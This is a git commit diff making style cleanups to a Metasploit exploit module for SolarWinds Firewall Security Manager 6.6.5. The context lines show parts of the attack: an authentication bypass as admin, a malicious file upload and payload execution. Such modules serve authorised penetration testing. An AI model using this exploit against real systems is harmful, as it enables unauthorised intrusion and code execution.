Do minor cleanup

jvazquez-r7 · jvazquez-r7 · commit 7c9b19c6f86b · 2015-04-03T11:53:50.000-05:00
diff --git a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
@@ -54,12 +54,12 @@ def initialize(info={})
           ['Solarwinds Firewall Security Manager 6.6.5', {}]
         ],
       'Privileged'     => false,
-      'DisclosureDate' => "Mar 13 2015",
+      'DisclosureDate' => 'Mar 13 2015',
       'DefaultTarget'  => 0))
 
     register_options(
       [
-        OptString.new('TARGETURI', [ true, "Base FMS directory path", '/'])
+        OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/'])
       ], self.class)
   end
 
@@ -86,7 +86,7 @@ def exploit
     # 'admin' is there by default and you can't delete it
     username = 'admin'
     print_status("Auth bypass: Putting session value: username=#{username}")
-    sid = put_session_value('admin')
+    sid = put_session_value(username)
     print_status("Your SID is: #{sid}")
 
     # Stage 2 of the attack
@@ -185,13 +185,13 @@ def upload_exec(sid, filename, malicious_file)
 
     if !res
       fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.')
-    elsif res && res.body.include?('java.lang.NoClassDefFoundError')
-      print_status("Payload being treated as XLS, indicates a successful upload.")
+    elsif res.body.include?('java.lang.NoClassDefFoundError')
+      print_status('Payload being treated as XLS, indicates a successful upload.')
     else
-      print_status("Unsure of a successful upload.")
+      print_status('Unsure of a successful upload.')
     end
 
-    print_status("Attempting to execute the payload.")
+    print_status('Attempting to execute the payload.')
     exec_file(sid, filename)
   end
 
